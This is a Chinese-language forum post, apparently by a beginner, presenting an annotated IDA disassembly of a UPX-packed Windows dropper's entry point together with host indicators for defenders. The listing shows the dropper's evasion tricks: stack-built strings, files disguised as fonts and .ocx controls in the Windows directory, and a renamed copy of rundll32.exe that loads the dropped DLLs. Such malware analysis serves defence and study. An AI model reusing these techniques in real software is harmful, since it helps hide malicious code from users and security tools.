由于是第一次在论坛发帖，只是练练逆向的水平，也是第一次分析这类病毒，不好的地方请不要喷，谢谢。
ida 分析如下:
代码:
;-----------------------------------------------------------------------
; start -- entry point of the dropper (UPX0 section, i.e. after the UPX
; stub has unpacked it), as listed by IDA.  Win32 x86, stdcall/cdecl mix.
; Frame: ebp-based, 2908 bytes of locals.  ebx is zeroed once and then
; reused everywhere as the NUL terminator, NULL handle and FALSE argument.
;
; What this listing shows, in order:
;   1. Several 260-byte (MAX_PATH) buffers are zeroed and the file names
;      the sample needs are assembled byte-by-byte on the stack (stack
;      strings), so they do not appear in the binary's string table.
;   2. ChangeProcessToken (analyst-named; body not shown) is called.
;   3. "%WINDIR%\fonts\dbr07028.ttf" is built and handed to
;      _CreateFile_Encryption (analyst-named; body not shown).
;   4. Three temp files (%08Xmdd.temp, %08Xime.temp, %08Xeime.temp, the
;      %08X being GetTickCount) are produced by CreateTempFile and then
;      moved with MoveFileExA onto dbr07028.ocx, winnt.com and
;      dbr99005.ocx, each prefixed by MyGetWindowsDirectory (analyst-named).
;   5. rundll32.exe is copied to gbvgbv07.exe, FindExplorer is called with
;      "explorer.exe" and the winnt.com path, and a command line of the
;      form "<gbvgbv07.exe> <dropped .ocx> <marker> [...]" is passed to
;      sub_401CAC (argument labelled lpCommandLine); then ExitProcess(0).
;
; Host artefacts a defender can look for (all names come from this
; listing): dbr07028.ocx, dbr07028.ttf, dbr99005.ocx, winnt.com,
; gbvgbv07.exe (a CopyFileA copy of rundll32.exe), *mdd.temp / *ime.temp /
; *eime.temp in the temp directory, the command-line markers
; "pfjaoidjglkajd" and "pfjieaoidjglkajd", and rundll32.exe content
; running under a different file name.
;
; Helper names (ChangeProcessToken, MyGetWindowsDirectory, Decrypt_PostAddress,
; _CreateFile_Encryption, GetTempPath_Set, CreateTempFile, FindExplorer,
; sub_401894, sub_401CAC) were assigned by the analyst; their bodies are
; not in this listing, so anything said about them below is inferred from
; their argument patterns and marked as such.
;-----------------------------------------------------------------------
UPX0:00401DA4 start proc near ; CODE XREF: UPX1:004136D8j
UPX0:00401DA4
UPX0:00401DA4 CommandLine= byte ptr -0B5Ch ; 520-byte command-line buffer (0B5Ch-954h)
UPX0:00401DA4 var_B5B= byte ptr -0B5Bh ; CommandLine+1, start of the rep stosd fill
UPX0:00401DA4 szCurrentModuleFileName= byte ptr -954h ; own path from GetModuleFileNameA
UPX0:00401DA4 hFile= byte ptr -850h ; misnamed by IDA: path buffer "%WINDIR%\fonts\dbr07028.ttf"
UPX0:00401DA4 szGbvgbv07= byte ptr -74Ch ; path of the rundll32.exe copy "gbvgbv07.exe"
UPX0:00401DA4 NewFileName= byte ptr -648h ; destination path "...\dbr07028.ocx"
UPX0:00401DA4 FileName= byte ptr -544h ; temp path "%08Xmdd.temp"
UPX0:00401DA4 Dest = byte ptr -440h ; destination path "...\dbr99005.ocx"
UPX0:00401DA4 szIme_Temp= byte ptr -33Ch ; temp path "%08Xime.temp" / "%08Xeime.temp"
UPX0:00401DA4 hObject= byte ptr -238h ; misnamed by IDA: path buffer "...\winnt.com"
UPX0:00401DA4 Array_22E= byte ptr -22Eh ; hObject+10, rest of the 260-byte buffer
UPX0:00401DA4 szWindowsDirectory1= byte ptr -134h ; path buffer "...\rundll32.exe"
UPX0:00401DA4 Array_127= byte ptr -127h ; szWindowsDirectory1+13, rest of the 260-byte buffer
UPX0:00401DA4 szFileName= byte ptr -30h ; base name "dbr07028"
UPX0:00401DA4 Exlorer.exe= byte ptr -1Ch ; stack string "explorer.exe" (13 bytes, -1Ch..-10h)
UPX0:00401DA4 var_1B= byte ptr -1Bh
UPX0:00401DA4 var_1A= byte ptr -1Ah
UPX0:00401DA4 var_19= byte ptr -19h
UPX0:00401DA4 var_18= byte ptr -18h
UPX0:00401DA4 var_17= byte ptr -17h
UPX0:00401DA4 var_16= byte ptr -16h
UPX0:00401DA4 var_15= byte ptr -15h
UPX0:00401DA4 var_14= byte ptr -14h
UPX0:00401DA4 var_13= byte ptr -13h
UPX0:00401DA4 var_12= byte ptr -12h
UPX0:00401DA4 var_11= byte ptr -11h
UPX0:00401DA4 var_10= byte ptr -10h
UPX0:00401DA4 SzFontsDir= byte ptr -0Ch ; stack string "\fonts\"
UPX0:00401DA4 nNumberOfBytesToWrite= byte ptr -4 ; misnamed by IDA: 4-byte stack string "TLS"
UPX0:00401DA4
UPX0:00401DA4 push ebp
UPX0:00401DA5 mov ebp, esp
UPX0:00401DA7 sub esp, 2908 ; locals
UPX0:00401DAD push ebx
UPX0:00401DAE push esi
UPX0:00401DAF push edi
UPX0:00401DB0 push 62 ; ecx = 62 dwords (push/pop is a 3-byte way to load a small immediate)
UPX0:00401DB2 xor ebx, ebx ; ebx = 0 for the rest of the function (NUL / NULL / FALSE)
UPX0:00401DB4 pop ecx
UPX0:00401DB5 xor eax, eax
UPX0:00401DB7 lea edi, [ebp+Array_22E]
UPX0:00401DBD mov [ebp+hObject], 'w' ; stack string "winnt.com": built one byte at a time so
UPX0:00401DC4 mov [ebp+hObject+1], 'i' ; it is not visible to static string extraction
UPX0:00401DCB mov [ebp+hObject+2], 'n'
UPX0:00401DD2 mov [ebp+hObject+3], 'n'
UPX0:00401DD9 mov [ebp+hObject+4], 't'
UPX0:00401DE0 mov [ebp+hObject+5], '.'
UPX0:00401DE7 mov [ebp+hObject+6], 'c'
UPX0:00401DEE mov [ebp+hObject+7], 'o'
UPX0:00401DF5 mov [ebp+hObject+8], 'm'
UPX0:00401DFC mov [ebp+hObject+9], bl ; NUL terminator
UPX0:00401E02 rep stosd ; zero the remaining 62*4+2 = 250 bytes -> 260-byte buffer in total
UPX0:00401E04 stosw
UPX0:00401E06 push 64 ; ecx = 64: 64*4+2+1 = 259 bytes zeroed after Dest[0]
UPX0:00401E08 xor eax, eax
UPX0:00401E0A pop ecx
UPX0:00401E0B lea edi, [ebp+Dest+1]
UPX0:00401E11 mov [ebp+Dest], bl
UPX0:00401E17 mov esi, sprintf ; esi = sprintf for the next several calls
UPX0:00401E1D rep stosd
UPX0:00401E1F stosw
UPX0:00401E21 stosb
UPX0:00401E22 push offset a005 ; "005"
UPX0:00401E27 lea eax, [ebp+Dest]
UPX0:00401E2D push offset Format ; "dbr99%s.ocx"
UPX0:00401E32 push eax ; Dest
UPX0:00401E33 mov [ebp+nNumberOfBytesToWrite], 'T' ; stack string "TLS" (interleaved by the
UPX0:00401E37 mov [ebp+nNumberOfBytesToWrite+1], 'L' ; compiler's scheduler); used later as
UPX0:00401E3B mov [ebp+nNumberOfBytesToWrite+2], 'S' ; an argument to CreateTempFile
UPX0:00401E3F mov [ebp+nNumberOfBytesToWrite+3], bl
UPX0:00401E42 call esi ; sprintf
UPX0:00401E42 ; sprintf(&Dest, "dbr99%s.ocx", "005") -> "dbr99005.ocx".
UPX0:00401E42 ; The original analyst did not see why it is split like this; it may simply
UPX0:00401E42 ; be a compile-time constant the author wanted to vary between builds.
UPX0:00401E44 add esp, 0Ch ; cdecl: 3 args
UPX0:00401E47 xor eax, eax
UPX0:00401E49 lea edi, [ebp+FileName+1]
UPX0:00401E4F mov [ebp+FileName], bl
UPX0:00401E55 push 64
UPX0:00401E57 mov [ebp+szIme_Temp], bl
UPX0:00401E5D pop ecx
UPX0:00401E5E mov [ebp+szWindowsDirectory1], 'r' ; first byte of stack string "rundll32.exe"
UPX0:00401E65 rep stosd
UPX0:00401E67 stosw
UPX0:00401E69 stosb
UPX0:00401E6A push 64
UPX0:00401E6C xor eax, eax
UPX0:00401E6E pop ecx
UPX0:00401E6F lea edi, [ebp+szIme_Temp+1]
UPX0:00401E75 rep stosd
UPX0:00401E77 stosw
UPX0:00401E79 stosb
UPX0:00401E79 ; The code above is two memset()s that zero 260-byte arrays (FileName and
UPX0:00401E79 ; szIme_Temp); the compiler's instruction scheduling interleaves them with
UPX0:00401E79 ; the stack-string stores, which makes the listing hard to read.
UPX0:00401E7A push 61 ; ecx = 61: 61*4+2+1 = 247 bytes after the 13-byte "rundll32.exe\0" -> 260
UPX0:00401E7C xor eax, eax
UPX0:00401E7E pop ecx
UPX0:00401E7F lea edi, [ebp+Array_127]
UPX0:00401E85 mov [ebp+szWindowsDirectory1+1], 'u' ; stack string "rundll32.exe" (continued)
UPX0:00401E8C mov [ebp+szWindowsDirectory1+2], 'n'
UPX0:00401E93 mov [ebp+szWindowsDirectory1+3], 'd'
UPX0:00401E9A mov [ebp+szWindowsDirectory1+4], 'l'
UPX0:00401EA1 mov [ebp+szWindowsDirectory1+5], 'l'
UPX0:00401EA8 mov [ebp+szWindowsDirectory1+6], '3'
UPX0:00401EAF mov [ebp+szWindowsDirectory1+7], '2'
UPX0:00401EB6 mov [ebp+szWindowsDirectory1+8], '.'
UPX0:00401EBD mov [ebp+szWindowsDirectory1+9], 'e'
UPX0:00401EC4 mov [ebp+szWindowsDirectory1+0Ah], 'x'
UPX0:00401ECB mov [ebp+szWindowsDirectory1+0Bh], 'e'
UPX0:00401ED2 mov [ebp+szWindowsDirectory1+0Ch], bl
UPX0:00401ED8 rep stosd
UPX0:00401EDA stosw
UPX0:00401EDC stosb
UPX0:00401EDD push 64
UPX0:00401EDF xor eax, eax
UPX0:00401EE1 pop ecx
UPX0:00401EE2 lea edi, [ebp+szGbvgbv07+1]
UPX0:00401EE8 mov [ebp+szGbvgbv07], bl
UPX0:00401EEE rep stosd ; memset(szGbvgbv07, 0, 260)
UPX0:00401EF0 stosw
UPX0:00401EF2 stosb
UPX0:00401EF3 call ChangeProcessToken ; adjusts process token privileges per the analyst's
UPX0:00401EF3 ; naming; takes no visible arguments, body not in this listing -- confirm
UPX0:00401EF8 mov edi, 260 ; edi = MAX_PATH, reused as nSize / uSize below
UPX0:00401EFD lea eax, [ebp+szCurrentModuleFileName]
UPX0:00401F03 push edi ; nSize
UPX0:00401F04 push eax ; lpFilename
UPX0:00401F05 push ebx ; hModule
UPX0:00401F06 call GetModuleFileNameA
UPX0:00401F06 ; full path of a loaded module; hModule == NULL selects the running
UPX0:00401F06 ; executable, so this is the sample's own path (used on the command line later)
UPX0:00401F0C lea eax, [ebp+szFileName]
UPX0:00401F0F push offset aDbr07028 ; "dbr07028"
UPX0:00401F14 push eax ; Dest
UPX0:00401F15 call esi ; sprintf
UPX0:00401F15 ; sprintf(&szFileName, "dbr07028") -- sprintf used as a plain strcpy
UPX0:00401F17 lea eax, [ebp+szFileName]
UPX0:00401F1A push eax
UPX0:00401F1B lea eax, [ebp+NewFileName]
UPX0:00401F21 push eax
UPX0:00401F22 call _mbscpy
UPX0:00401F22 ; _mbscpy(&NewFileName, &szFileName)
UPX0:00401F27 lea eax, [ebp+NewFileName]
UPX0:00401F2D push offset a_ocx ; ".ocx"
UPX0:00401F32 push eax
UPX0:00401F33 call _mbscat
UPX0:00401F33 ; _mbscat(&NewFileName, ".ocx") -> "dbr07028.ocx"
UPX0:00401F38 lea eax, [ebp+NewFileName]
UPX0:00401F3E push eax
UPX0:00401F3F lea eax, [ebp+NewFileName]
UPX0:00401F45 push eax
UPX0:00401F46 call MyGetWindowsDirectory
UPX0:00401F46 ; MyGetWindowsDirectory(&NewFileName, &NewFileName): the same buffer is
UPX0:00401F46 ; passed as both arguments, i.e. an in-place in/out parameter.  Per the
UPX0:00401F46 ; analyst this yields the full path at which the .ocx will be dropped;
UPX0:00401F46 ; the call at 00402102 below shows the order is (name, out_buffer).
UPX0:00401F4B lea eax, [ebp+szCurrentModuleFileName]
UPX0:00401F51 push eax ; NumberOfBytesRead
UPX0:00401F52 call Decrypt_PostAddress
UPX0:00401F52 ; Decrypt_PostAddress(&szCurrentModuleFileName): per the analyst it decrypts
UPX0:00401F52 ; some embedded data and checks whether the sample has been unpacked
UPX0:00401F52 ; (anti-analysis); body not in this listing -- confirm
UPX0:00401F57 add esp, 24h ; cdecl cleanup for the 5 calls above (8+8+8+8+4 = 36 bytes)
UPX0:00401F5A lea eax, [ebp+hFile]
UPX0:00401F60 mov [ebp+SzFontsDir], '\' ; stack string "\fonts\"
UPX0:00401F64 mov [ebp+SzFontsDir+1], 'f'
UPX0:00401F68 push edi ; uSize
UPX0:00401F69 push eax ; lpBuffer
UPX0:00401F6A mov [ebp+SzFontsDir+2], 'o'
UPX0:00401F6E mov [ebp+SzFontsDir+3], 'n'
UPX0:00401F72 mov [ebp+SzFontsDir+4], 't'
UPX0:00401F76 mov [ebp+SzFontsDir+5], 's'
UPX0:00401F7A mov [ebp+SzFontsDir+6], '\'
UPX0:00401F7E mov [ebp+SzFontsDir+7], bl
UPX0:00401F81 call GetWindowsDirectoryA ; hFile = "%WINDIR%"
UPX0:00401F87 lea eax, [ebp+SzFontsDir]
UPX0:00401F8A push eax
UPX0:00401F8B lea eax, [ebp+hFile]
UPX0:00401F91 push eax
UPX0:00401F92 call _mbscat
UPX0:00401F92 ; hFile += "\fonts\" -- the file is placed in the Windows fonts directory,
UPX0:00401F92 ; presumably because a .ttf there does not look out of place
UPX0:00401F97 lea eax, [ebp+szFileName]
UPX0:00401F9A push eax
UPX0:00401F9B lea eax, [ebp+hFile]
UPX0:00401FA1 push eax
UPX0:00401FA2 call _mbscat
UPX0:00401FA2 ; hFile += "dbr07028"
UPX0:00401FA7 lea eax, [ebp+hFile]
UPX0:00401FAD push offset a_ttf ; ".ttf"
UPX0:00401FB2 push eax
UPX0:00401FB3 call _mbscat
UPX0:00401FB3 ; hFile += ".ttf"  => "%WINDIR%\fonts\dbr07028.ttf"
UPX0:00401FB8 lea eax, [ebp+hFile]
UPX0:00401FBE push eax ; hFile
UPX0:00401FBF call _CreateFile_Encryption ; creates the .ttf path; what is written into it
UPX0:00401FBF ; is inside the callee (analyst-named), not in this listing
UPX0:00401FC4 mov edi, GetTickCount ; edi = GetTickCount for the three temp-file names
UPX0:00401FCA add esp, 1Ch ; 3 x _mbscat (24) + _CreateFile_Encryption (4)
UPX0:00401FCD call edi ; GetTickCount
UPX0:00401FCD ; milliseconds since boot -- apparently used as a cheap pseudo-random value
UPX0:00401FCD ; to make the temp file name unique; it is not a secure random source
UPX0:00401FCF push eax
UPX0:00401FD0 lea eax, [ebp+FileName]
UPX0:00401FD6 push offset a08xmdd_temp ; "%08Xmdd.temp"
UPX0:00401FDB push eax ; Dest
UPX0:00401FDC call esi ; sprintf
UPX0:00401FDC ; sprintf(&FileName, "%08Xmdd.temp", tick)
UPX0:00401FDE lea eax, [ebp+FileName]
UPX0:00401FE4 push eax
UPX0:00401FE5 lea eax, [ebp+FileName]
UPX0:00401FEB push eax
UPX0:00401FEC call GetTempPath_Set ; in-place again: presumably prefixes FileName with the temp directory
UPX0:00401FF1 lea eax, [ebp+FileName]
UPX0:00401FF7 push eax ; lpFileName
UPX0:00401FF8 lea eax, [ebp+nNumberOfBytesToWrite]
UPX0:00401FFB push 66h ; NumberOfBytesWritten
UPX0:00401FFD push eax ; nNumberOfBytesToWrite
UPX0:00401FFE push ebx ; hModule
UPX0:00401FFF call CreateTempFile
UPX0:00401FFF ; CreateTempFile(0, &"TLS", 66h, &FileName).  The original analyst read these
UPX0:00401FFF ; as CreateFile arguments, but IDA's labels are guesses.  The (hModule=0,
UPX0:00401FFF ; 66h, "TLS") triple matches the FindResource(hModule, MAKEINTRESOURCE(66h),
UPX0:00401FFF ; "TLS") argument pattern, so this likely extracts an embedded resource of
UPX0:00401FFF ; type "TLS" into the temp file -- NOTE(review): confirm inside CreateTempFile
UPX0:00402004 add esp, 24h ; sprintf (12) + GetTempPath_Set (8) + CreateTempFile (16)
UPX0:00402007 lea eax, [ebp+NewFileName]
UPX0:0040200D push 3 ; dwFlags
UPX0:0040200F push eax ; lpNewFileName
UPX0:00402010 lea eax, [ebp+FileName]
UPX0:00402016 push eax ; lpExistingFileName
UPX0:00402017 call MoveFileExA
UPX0:00402017 ; MoveFileExA(temp, NewFileName, 3): 3 = MOVEFILE_REPLACE_EXISTING |
UPX0:00402017 ; MOVEFILE_COPY_ALLOWED, so an existing dbr07028.ocx is overwritten
UPX0:0040201D call edi ; GetTickCount
UPX0:0040201F push eax
UPX0:00402020 lea eax, [ebp+szIme_Temp]
UPX0:00402026 push offset a08xime_temp ; "%08Xime.temp"
UPX0:0040202B push eax ; Dest
UPX0:0040202C call esi ; sprintf -- second temp file, same pattern as above
UPX0:0040202E lea eax, [ebp+szIme_Temp]
UPX0:00402034 push eax
UPX0:00402035 lea eax, [ebp+szIme_Temp]
UPX0:0040203B push eax
UPX0:0040203C call GetTempPath_Set
UPX0:00402041 lea eax, [ebp+szIme_Temp]
UPX0:00402047 push eax ; lpFileName
UPX0:00402048 lea eax, [ebp+nNumberOfBytesToWrite]
UPX0:0040204B push 65h ; NumberOfBytesWritten
UPX0:0040204D push eax ; nNumberOfBytesToWrite
UPX0:0040204E push ebx ; hModule
UPX0:0040204F call CreateTempFile ; CreateTempFile(0, &"TLS", 65h, &szIme_Temp) -- second "TLS" item
UPX0:00402054 lea eax, [ebp+hObject]
UPX0:0040205A push eax
UPX0:0040205B lea eax, [ebp+hObject]
UPX0:00402061 push eax
UPX0:00402062 call MyGetWindowsDirectory ; hObject = "<windows dir>\winnt.com" (in place)
UPX0:00402067 add esp, 2Ch ; 12 + 8 + 16 + 8 = 44
UPX0:0040206A lea eax, [ebp+hObject]
UPX0:00402070 push 3 ; dwFlags
UPX0:00402072 push eax ; lpNewFileName
UPX0:00402073 lea eax, [ebp+szIme_Temp]
UPX0:00402079 push eax ; lpExistingFileName
UPX0:0040207A call MoveFileExA ; temp -> winnt.com, replace if present
UPX0:00402080 call edi ; GetTickCount
UPX0:00402082 push eax
UPX0:00402083 lea eax, [ebp+szIme_Temp]
UPX0:00402089 push offset a08xeime_temp ; "%08Xeime.temp"
UPX0:0040208E push eax ; Dest
UPX0:0040208F call esi ; sprintf -- third temp file
UPX0:00402091 lea eax, [ebp+szIme_Temp]
UPX0:00402097 push eax
UPX0:00402098 lea eax, [ebp+szIme_Temp]
UPX0:0040209E push eax
UPX0:0040209F call GetTempPath_Set
UPX0:004020A4 lea eax, [ebp+szIme_Temp]
UPX0:004020AA push eax ; lpFileName
UPX0:004020AB lea eax, [ebp+nNumberOfBytesToWrite]
UPX0:004020AE push 67h ; NumberOfBytesWritten
UPX0:004020B0 push eax ; nNumberOfBytesToWrite
UPX0:004020B1 push ebx ; hModule
UPX0:004020B2 call CreateTempFile ; CreateTempFile(0, &"TLS", 67h, &szIme_Temp) -- third "TLS" item
UPX0:004020B7 lea eax, [ebp+Dest]
UPX0:004020BD push eax
UPX0:004020BE lea eax, [ebp+Dest]
UPX0:004020C4 push eax
UPX0:004020C5 call MyGetWindowsDirectory ; Dest = "<windows dir>\dbr99005.ocx" (in place)
UPX0:004020CA add esp, 2Ch
UPX0:004020CD lea eax, [ebp+Dest]
UPX0:004020D3 push 3 ; dwFlags
UPX0:004020D5 push eax ; lpNewFileName
UPX0:004020D6 lea eax, [ebp+szIme_Temp]
UPX0:004020DC push eax ; lpExistingFileName
UPX0:004020DD call MoveFileExA ; move the temp file just created onto the Dest path
UPX0:004020E3 lea eax, [ebp+szWindowsDirectory1]
UPX0:004020E9 push eax
UPX0:004020EA lea eax, [ebp+szWindowsDirectory1]
UPX0:004020F0 push eax
UPX0:004020F1 call MyGetWindowsDirectory ; szWindowsDirectory1 = "<windows dir>\rundll32.exe"
UPX0:004020F6 lea eax, [ebp+szGbvgbv07]
UPX0:004020FC push eax
UPX0:004020FD push offset aGbvgbv07_exe ; "gbvgbv07.exe"
UPX0:00402102 call MyGetWindowsDirectory
UPX0:00402102 ; MyGetWindowsDirectory("gbvgbv07.exe", &szGbvgbv07) -- here the two
UPX0:00402102 ; arguments differ, which fixes the parameter order as (name, out_buffer).
UPX0:00402102 ; The original analyst believed every call also creates something on the
UPX0:00402102 ; system; that is not visible here and would need a debugger trace to confirm.
UPX0:00402107 add esp, 10h ; 2 x 8
UPX0:0040210A lea eax, [ebp+szGbvgbv07]
UPX0:00402110 push ebx ; bFailIfExists
UPX0:00402111 push eax ; lpNewFileName
UPX0:00402112 lea eax, [ebp+szWindowsDirectory1]
UPX0:00402118 push eax ; lpExistingFileName
UPX0:00402119 call CopyFileA
UPX0:00402119 ; CopyFileA(rundll32.exe, gbvgbv07.exe, FALSE): a byte-for-byte copy of the
UPX0:00402119 ; legitimate rundll32.exe under a new name, so the later process launch does
UPX0:00402119 ; not show "rundll32.exe" as the image name.  A renamed system binary
UPX0:00402119 ; (original-filename mismatch) is the detection hook here.
UPX0:0040211F lea eax, [ebp+hObject]
UPX0:00402125 mov [ebp+Exlorer.exe], 'e' ; stack string "explorer.exe"
UPX0:00402129 push eax ; hObject
UPX0:0040212A lea eax, [ebp+Exlorer.exe]
UPX0:0040212D push eax ; Exlorer.exe
UPX0:0040212E mov [ebp+var_1B], 'x'
UPX0:00402132 mov [ebp+var_1A], 'p'
UPX0:00402136 mov [ebp+var_19], 'l'
UPX0:0040213A mov [ebp+var_18], 'o'
UPX0:0040213E mov [ebp+var_17], 'r'
UPX0:00402142 mov [ebp+var_16], 'e'
UPX0:00402146 mov [ebp+var_15], 'r'
UPX0:0040214A mov [ebp+var_14], '.'
UPX0:0040214E mov [ebp+var_13], 'e'
UPX0:00402152 mov [ebp+var_12], 'x'
UPX0:00402156 mov [ebp+var_11], 'e'
UPX0:0040215A mov [ebp+var_10], bl
UPX0:0040215D call FindExplorer
UPX0:0040215D ; FindExplorer("explorer.exe", &hObject /* winnt.com path */).  The original
UPX0:0040215D ; analyst suspects this targets explorer.exe for injection; nothing in this
UPX0:0040215D ; listing confirms that -- the callee body is needed.
UPX0:00402162 mov ecx, 81h ; 0x81*4+2+1 = 519 bytes + CommandLine[0] = 520-byte memset
UPX0:00402167 xor eax, eax
UPX0:00402169 lea edi, [ebp+var_B5B]
UPX0:0040216F mov [ebp+CommandLine], bl
UPX0:00402175 rep stosd
UPX0:00402177 stosw
UPX0:00402179 stosb
UPX0:0040217A lea eax, [ebp+NewFileName]
UPX0:00402180 push eax ; lpFileName
UPX0:00402181 call sub_401894 ; takes a path, returns nonzero to proceed -- presumably an
UPX0:00402181 ; existence/validity check on the dropped dbr07028.ocx; body not shown
UPX0:00402186 mov esi, WsPrintf ; esi = wsprintf from here on
UPX0:0040218C add esp, 0Ch ; FindExplorer (8) + sub_401894 (4)
UPX0:0040218F test eax, eax
UPX0:00402191 jz short loc_4021C5 ; skip the first launch if the check failed
UPX0:00402193 lea eax, [ebp+szCurrentModuleFileName]
UPX0:00402199 push eax ; _DWORD
UPX0:0040219A lea eax, [ebp+NewFileName]
UPX0:004021A0 push eax ; _DWORD
UPX0:004021A1 lea eax, [ebp+szGbvgbv07]
UPX0:004021A7 push eax ; _DWORD
UPX0:004021A8 lea eax, [ebp+CommandLine]
UPX0:004021AE push offset aSSPfjaoidjglka ; "%s %s pfjaoidjglkajd %s"
UPX0:004021B3 push eax ; _DWORD
UPX0:004021B4 call esi ; WsPrintf
UPX0:004021B4 ; wsprintf(CommandLine, "%s %s pfjaoidjglkajd %s",
UPX0:004021B4 ;          szGbvgbv07, NewFileName, szCurrentModuleFileName)
UPX0:004021B4 ; => "<windir>\gbvgbv07.exe <path>\dbr07028.ocx pfjaoidjglkajd <own path>":
UPX0:004021B4 ; the rundll32 copy is used as a loader for the dropped .ocx (a DLL); the
UPX0:004021B4 ; fixed token is presumably a marker the DLL checks, and the sample's own
UPX0:004021B4 ; path is passed along (self-deletion by the child would be a common reason)
UPX0:004021B6 lea eax, [ebp+CommandLine]
UPX0:004021BC push eax ; lpCommandLine
UPX0:004021BD call sub_401CAC ; argument labelled lpCommandLine -- presumably CreateProcess; body not shown
UPX0:004021C2 add esp, 18h ; wsprintf (20) + sub_401CAC (4)
UPX0:004021C5
UPX0:004021C5 loc_4021C5: ; CODE XREF: start+3EDj
UPX0:004021C5 lea eax, [ebp+Dest]
UPX0:004021CB push eax ; lpFileName
UPX0:004021CC call sub_401894 ; same check on the second dropped file, dbr99005.ocx
UPX0:004021D1 test eax, eax
UPX0:004021D3 pop ecx ; cdecl cleanup of the one argument (flags preserved by pop)
UPX0:004021D4 jz short loc_402201
UPX0:004021D6 lea eax, [ebp+Dest]
UPX0:004021DC push eax ; _DWORD
UPX0:004021DD lea eax, [ebp+szGbvgbv07]
UPX0:004021E3 push eax ; _DWORD
UPX0:004021E4 lea eax, [ebp+CommandLine]
UPX0:004021EA push offset aSSPfjieaoidjgl ; "%s %s pfjieaoidjglkajd"
UPX0:004021EF push eax ; _DWORD
UPX0:004021F0 call esi ; WsPrintf
UPX0:004021F0 ; wsprintf(CommandLine, "%s %s pfjieaoidjglkajd", szGbvgbv07, Dest)
UPX0:004021F0 ; => "<windir>\gbvgbv07.exe <windows dir>\dbr99005.ocx pfjieaoidjglkajd"
UPX0:004021F2 lea eax, [ebp+CommandLine]
UPX0:004021F8 push eax ; lpCommandLine
UPX0:004021F9 call sub_401CAC ; second launch
UPX0:004021FE add esp, 14h ; wsprintf (16) + sub_401CAC (4)
UPX0:00402201
UPX0:00402201 loc_402201: ; CODE XREF: start+430j
UPX0:00402201 push ebx ; uExitCode
UPX0:00402202 call ExitProcess ; ExitProcess(0) -- never returns
UPX0:00402208 ; ---------------------------------------------------------------------------
UPX0:00402208 ; Everything below is dead code: ExitProcess does not return, so the pushed
UPX0:00402208 ; callee-saved registers are never restored on this path.  IDA ends the
UPX0:00402208 ; function at 'leave' and reports "sp-analysis failed" for the same reason.
UPX0:00402208 push 1
UPX0:0040220A pop eax ; eax = 1 (would be the return value)
UPX0:0040220B pop edi
UPX0:0040220C pop esi
UPX0:0040220D pop ebx
UPX0:0040220E leave
UPX0:0040220E start endp ; sp-analysis failed
UPX0:0040220E
UPX0:0040220F retn 10h ; stdcall-style 16-byte cleanup, left outside the proc by IDA
欢迎讨论.